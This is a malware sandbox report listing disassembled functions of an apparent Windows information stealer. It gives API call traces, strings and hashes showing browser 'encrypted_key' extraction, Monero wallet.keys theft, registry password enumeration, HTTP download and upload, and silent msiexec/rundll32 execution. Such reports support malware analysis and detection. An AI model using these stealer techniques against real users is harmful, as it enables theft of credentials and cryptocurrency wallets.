Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: ade47f0a974f10c7bc16633cd78efc97a13a2dffe8130c965e96f6f2bb95c464
Instruction ID: 43f8ac416cb9b823db2283ba99bf4afb511f8f06efa02481fc3f2e7b5d6f774f
Opcode Fuzzy Hash: ade47f0a974f10c7bc16633cd78efc97a13a2dffe8130c965e96f6f2bb95c464
Instruction Fuzzy Hash: B5C1C4B1900219ABCB14EF60DC89FDA7378BB64308F0045DEF50AA7251EA74AAD5CF95

Function 00412940 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

ShellExecuteEx.SHELL32(0000003C), ref: 00412CD5
ShellExecuteEx.SHELL32(0000003C), ref: 00412E6D
ShellExecuteEx.SHELL32(0000003C), ref: 00412FFA

Strings

"" , xrefs: 00412BAA
<, xrefs: 00412FA0
.dll, xrefs: 00412CF5
C:\Windows\system32\msiexec.exe, xrefs: 00412FCF
C:\Windows\system32\rundll32.exe, xrefs: 00412E42
.msi, xrefs: 00412EA8
/passive, xrefs: 00412F6B
/i ", xrefs: 00412EF4

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 132468691be608e8370bddf96287dc368f7d6c6650ff449d625802097748d1b7
Instruction ID: f1658c825a9884a12c356146fd8d4c6d848a61a952cd10e5c69c9f5a52c1d3c9
Opcode Fuzzy Hash: 132468691be608e8370bddf96287dc368f7d6c6650ff449d625802097748d1b7
Instruction Fuzzy Hash: FA121F71811108AACB14FBA1DC96FDEB778AF14314F40415EF40666192EF782BD9CFAA

Function 007F3FF7 Relevance: 19.7, APIs: 13, Instructions: 193stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 007F4015
memset.MSVCRT ref: 007F402C

Part of subcall function 007F8AE7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8B12

lstrcat.KERNEL32(?,00000000), ref: 007F4063
lstrcat.KERNEL32(?,0062CB0C), ref: 007F4082
lstrcat.KERNEL32(?,?), ref: 007F4096
lstrcat.KERNEL32(?,0062CDD8), ref: 007F40AA

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007F8A97: GetFileAttributesA.KERNEL32(00000000,?,007E1DFB,?,?,0042554C,?,?,00420E07), ref: 007F8AA6

Part of subcall function 007E9F97: StrStrA.SHLWAPI(00000000,00421278), ref: 007E9FF0
Part of subcall function 007E9F97: memcmp.MSVCRT ref: 007EA049

Part of subcall function 007E9C77: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E9CA3
Part of subcall function 007E9C77: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007E9CC8
Part of subcall function 007E9C77: LocalAlloc.KERNEL32(00000040,?), ref: 007E9CE8
Part of subcall function 007E9C77: ReadFile.KERNEL32(000000FF,?,00000000,007E16F6,00000000), ref: 007E9D11
Part of subcall function 007E9C77: LocalFree.KERNEL32(007E16F6), ref: 007E9D47
Part of subcall function 007E9C77: CloseHandle.KERNEL32(000000FF), ref: 007E9D51

Part of subcall function 007F90C7: GlobalAlloc.KERNEL32(00000000,007F4154,007F4154), ref: 007F90DA

StrStrA.SHLWAPI(?,0062C8D8), ref: 007F416A
GlobalFree.KERNEL32(?), ref: 007F4266

Part of subcall function 007E9D77: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,007E51A5,00000000,00000000), ref: 007E9DA6
Part of subcall function 007E9D77: LocalAlloc.KERNEL32(00000040,?,?,?,007E51A5,00000000,?), ref: 007E9DB8
Part of subcall function 007E9D77: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,007E51A5,00000000,00000000), ref: 007E9DE1
Part of subcall function 007E9D77: LocalFree.KERNEL32(?,?,?,?,007E51A5,00000000,?), ref: 007E9DF6

Part of subcall function 007EA0C7: memcmp.MSVCRT ref: 007EA0E2
Part of subcall function 007EA0C7: memset.MSVCRT ref: 007EA115
Part of subcall function 007EA0C7: LocalAlloc.KERNEL32(00000040,?), ref: 007EA165

lstrcat.KERNEL32(?,00000000), ref: 007F41F7
StrCmpCA.SHLWAPI(?,0042089B,?,?,?,?,000003E8), ref: 007F4214
lstrcat.KERNEL32(00000000,00000000), ref: 007F4226
lstrcat.KERNEL32(00000000,?), ref: 007F4239
lstrcat.KERNEL32(00000000,00420F88), ref: 007F4248

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 1812951797-0
Opcode ID: f0a029bfea9c41fc086c34da6774015c23f89926e84f9b52b92742e5d98bae41
Instruction ID: 92aaf1f38c51f5c46d1f88eeaeaedcd306d41b2ed6fcdcf447716234cedf3450
Opcode Fuzzy Hash: f0a029bfea9c41fc086c34da6774015c23f89926e84f9b52b92742e5d98bae41
Instruction Fuzzy Hash: DD7126B2900218FBCB14EBA4DC49FEE7779AF48700F008598F70997291EA79DB45CB65

Function 00413D90 Relevance: 19.7, APIs: 13, Instructions: 193stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413DAE
memset.MSVCRT ref: 00413DC5

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 00413DFC
lstrcat.KERNEL32(?,0087B7F8), ref: 00413E1B
lstrcat.KERNEL32(?,?), ref: 00413E2F
lstrcat.KERNEL32(?,0087B600), ref: 00413E43

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 00418830: GetFileAttributesA.KERNEL32(00000000,?,0040FF57,?,00000000,?,00000000,00420D97,00420D96), ref: 0041883F

Part of subcall function 00409D30: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D89
Part of subcall function 00409D30: memcmp.MSVCRT ref: 00409DE2

Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
Part of subcall function 00409A10: CloseHandle.KERNEL32(000000FF), ref: 00409AEA

Part of subcall function 00418E60: GlobalAlloc.KERNEL32(00000000,00413EED,00413EED), ref: 00418E73

StrStrA.SHLWAPI(?,0087C4A8), ref: 00413F03
GlobalFree.KERNEL32(?), ref: 00413FFF

Part of subcall function 00409B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B3F
Part of subcall function 00409B10: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 00409B51
Part of subcall function 00409B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B7A
Part of subcall function 00409B10: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 00409B8F

Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE

lstrcat.KERNEL32(?,00000000), ref: 00413F90
StrCmpCA.SHLWAPI(?,0042089B,?,?,?,?,000003E8), ref: 00413FAD
lstrcat.KERNEL32(00000000,00000000), ref: 00413FBF
lstrcat.KERNEL32(00000000,?), ref: 00413FD2
lstrcat.KERNEL32(00000000,00420F88), ref: 00413FE1

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 1812951797-0
Opcode ID: 8ecaa6dfe6765f0894037b008c3f5f31f63a5d16bcb5f4236cbcaf156c56a13e
Instruction ID: d4b1db0ab37bfb67570dd3d18e95715430c5246f155b9e5a4f3dc5da96f51bca
Opcode Fuzzy Hash: 8ecaa6dfe6765f0894037b008c3f5f31f63a5d16bcb5f4236cbcaf156c56a13e
Instruction Fuzzy Hash: 0D716672900218ABCB14EBA1DC49FDE7779AF48304F00859DF605A7191EA789B85CFA5

Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401327

Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF

lstrcat.KERNEL32(?,00000000), ref: 0040134F
lstrlenA.KERNEL32(?), ref: 0040135C
lstrcat.KERNEL32(?,.keys), ref: 00401377

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00418600: GetSystemTime.KERNEL32(?,008499C8,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
Part of subcall function 00409A10: CloseHandle.KERNEL32(000000FF), ref: 00409AEA

DeleteFileA.KERNEL32(00000000), ref: 004014EF
memset.MSVCRT ref: 00401516

Strings

\Monero\wallet.keys, xrefs: 0040138D
SOFTWARE\monero-project\monero-core, xrefs: 00401335
wallet_path, xrefs: 00401330
.keys, xrefs: 0040136B

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1930502592-218353709
Opcode ID: c72a4ed820f5966f7acbd02f2748cbdaccdbb3ca3af7c7b9edcb03a25defdd18
Instruction ID: 953294376e47f8e4316e7e62fd6b04658e6323c3fb6fa537345fd6b82421038a
Opcode Fuzzy Hash: c72a4ed820f5966f7acbd02f2748cbdaccdbb3ca3af7c7b9edcb03a25defdd18
Instruction Fuzzy Hash: 395175B1D5011867CB14EB61DC96FED733CAF50314F4041ADB60A62092EE786BD9CFAA

Function 00414DA0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,0087CDA8), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,0087C3D0,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DF8
lstrlenA.KERNEL32(00000000), ref: 00414E0F

Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

StrStrA.SHLWAPI(00000000,00000000), ref: 00414E44
lstrlenA.KERNEL32(00000000), ref: 00414E63
strtok.MSVCRT ref: 00414E7E
lstrlenA.KERNEL32(00000000), ref: 00414E8E

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Strings

ERROR, xrefs: 00414E99
ERROR, xrefs: 00414F12
ERROR, xrefs: 00414DEA
ERROR, xrefs: 00414F4F
ERROR, xrefs: 00414F89

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3532888709-1526165396
Opcode ID: 33d2ba14acf4f5bfa510b6f40453a1453bcb3ab5b6d644ebc244f11e9e1de2f7
Instruction ID: 8f24e6183c5aafacdfff780c7fa5c74c912095ee1ff337cf81358bf1c292c6a0
Opcode Fuzzy Hash: 33d2ba14acf4f5bfa510b6f40453a1453bcb3ab5b6d644ebc244f11e9e1de2f7
Instruction Fuzzy Hash: D5516130911108ABCB14FF61CC9AEED7738AF50358F50401EF80B665A2DF786B95CB6A

Function 004060F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

InternetOpenA.WININET(00420DE2,00000001,00000000,00000000,00000000), ref: 0040615F
StrCmpCA.SHLWAPI(?,0087CDA8), ref: 00406197
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
InternetReadFile.WININET(q&A,?,00000400,?), ref: 0040622C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
InternetCloseHandle.WININET(q&A), ref: 004062A3
InternetCloseHandle.WININET(00000000), ref: 004062B0

Strings

q&A, xrefs: 0040629F, 00406228, 0040622B, 004062A2
q&A, xrefs: 00406100, 004061CF, 004062B6, 00406174, 00406103

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Internet$CloseFileHandle$Open$??2@CrackCreateReadWritelstrcpylstrlen
String ID: q&A$q&A
API String ID: 449328342-3681770271
Opcode ID: ecb52d8b8dc2c8bd35f8627d9c91e68ac13c8beb156bbcf732295241b355c95a
Instruction ID: 439f38139d03757dc0e639f6b6df0271613160f362a72270d2c4ade6ce016e72
Opcode Fuzzy Hash: ecb52d8b8dc2c8bd35f8627d9c91e68ac13c8beb156bbcf732295241b355c95a
Instruction Fuzzy Hash: C15161B1A00218ABDB20EF50CD49FEE7779AF44305F1081ADB606B71C1DB786A95CF99

Function 00418AB0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 00418BD6

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: cbcfc911f0522ba7d6954a58fe80c36526870c76c402a6842a40eb5faee38275
Instruction ID: ab8c993fcc5868c7862916c534b465bb792f4261399987fcbf2c6f11a1cf59ff
Opcode Fuzzy Hash: cbcfc911f0522ba7d6954a58fe80c36526870c76c402a6842a40eb5faee38275
Instruction Fuzzy Hash: 2E711CB1A10208ABDB14EFE4DC89FEEB779BF48700F108509F516AB290DB74A945CB65

Function 007E4B37 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA3D7: lstrcpy.KERNEL32(?,00000000), ref: 007FA41D

Part of subcall function 007E4A67: ??2@YAPAXI@Z.MSVCRT ref: 007E4AA1
Part of subcall function 007E4A67: ??2@YAPAXI@Z.MSVCRT ref: 007E4AB8
Part of subcall function 007E4A67: ??2@YAPAXI@Z.MSVCRT ref: 007E4ACF
Part of subcall function 007E4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AF0
Part of subcall function 007E4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4B00

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007E4BCC
StrCmpCA.SHLWAPI(?,0062CC80), ref: 007E4BF1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E4D71
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DC3,00000000,?,?,00000000,?,0042192C,00000000,?,0062CD14), ref: 007E509F
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007E50BB
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007E50CF
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007E5100
InternetCloseHandle.WININET(00000000), ref: 007E5164
InternetCloseHandle.WININET(00000000), ref: 007E517C
HttpOpenRequestA.WININET(00000000,0062CC9C,?,0062CAB4,00000000,00000000,00400100,00000000), ref: 007E4DCC

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

Part of subcall function 007FA557: lstrcpy.KERNEL32(00000000,?), ref: 007FA5A9
Part of subcall function 007FA557: lstrcat.KERNEL32(00000000), ref: 007FA5B9

InternetCloseHandle.WININET(00000000), ref: 007E5186

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID:
API String ID: 2402878923-0
Opcode ID: ae6e71aa8fa1522145f7cf29633a19ca7124558bb694163aa7c538febaf07d2d
Instruction ID: fca532d90f9a927efd2b50f3ba59728d1a011ee09b5338eee0229950fd956f50
Opcode Fuzzy Hash: ae6e71aa8fa1522145f7cf29633a19ca7124558bb694163aa7c538febaf07d2d
Instruction Fuzzy Hash: 4E12FBB191025CEACB15EBA4DC9AFFEB339AF14300F504199B24A63191DF782F48DB56

Function 007E6537 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA3D7: lstrcpy.KERNEL32(?,00000000), ref: 007FA41D

Part of subcall function 007E4A67: ??2@YAPAXI@Z.MSVCRT ref: 007E4AA1
Part of subcall function 007E4A67: ??2@YAPAXI@Z.MSVCRT ref: 007E4AB8
Part of subcall function 007E4A67: ??2@YAPAXI@Z.MSVCRT ref: 007E4ACF
Part of subcall function 007E4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AF0
Part of subcall function 007E4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4B00

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000), ref: 007E6598
StrCmpCA.SHLWAPI(?,0062CC80), ref: 007E65BA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E65EC
HttpOpenRequestA.WININET(00000000,004219CC,?,0062CAB4,00000000,00000000,00400100,00000000), ref: 007E663C
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007E6676
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E6688
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007E66B4
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007E6724
InternetCloseHandle.WININET(00000000), ref: 007E67A6
InternetCloseHandle.WININET(00000000), ref: 007E67B0
InternetCloseHandle.WININET(00000000), ref: 007E67BA

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID:
API String ID: 3074848878-0
Opcode ID: e04e365edaac092541763939bf10095d935888e95814e6bdcfa20da3470c62e3
Instruction ID: 5db9b12c63f26a8697bf9f7009225e230a51920fe49eae26fbd00fcb13c9280f
Opcode Fuzzy Hash: e04e365edaac092541763939bf10095d935888e95814e6bdcfa20da3470c62e3
Instruction Fuzzy Hash: C0718171A0025CEBDB24DFA4CC49FEEB775AF58740F104099F60A6B290DBB86A85DF41

Function 00407610 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407310: memset.MSVCRT ref: 00407354
Part of subcall function 00407310: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CD0), ref: 0040737A
Part of subcall function 00407310: RegEnumValueA.ADVAPI32(00407CD0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073F1
Part of subcall function 00407310: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040744D
Part of subcall function 00407310: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407492
Part of subcall function 00407310: HeapFree.KERNEL32(00000000,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407499

lstrcat.KERNEL32(00000000,004217A0), ref: 00407646
lstrcat.KERNEL32(00000000,00000000), ref: 00407688
lstrcat.KERNEL32(00000000, : ), ref: 0040769A
lstrcat.KERNEL32(00000000,00000000), ref: 004076CF
lstrcat.KERNEL32(00000000,004217A8), ref: 004076E0
lstrcat.KERNEL32(00000000,00000000), ref: 00407713
lstrcat.KERNEL32(00000000,004217AC), ref: 0040772D
task.LIBCPMTD ref: 0040773B

Strings

: , xrefs: 0040768E

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: ea4af66432e175890d232238cdc4e6e4d9d9e436a8d2b39900d38b7316cc0590
Instruction ID: 05ed671df160738881f441edec20510396de118aefbcae7eba62044a73751e2f
Opcode Fuzzy Hash: ea4af66432e175890d232238cdc4e6e4d9d9e436a8d2b39900d38b7316cc0590
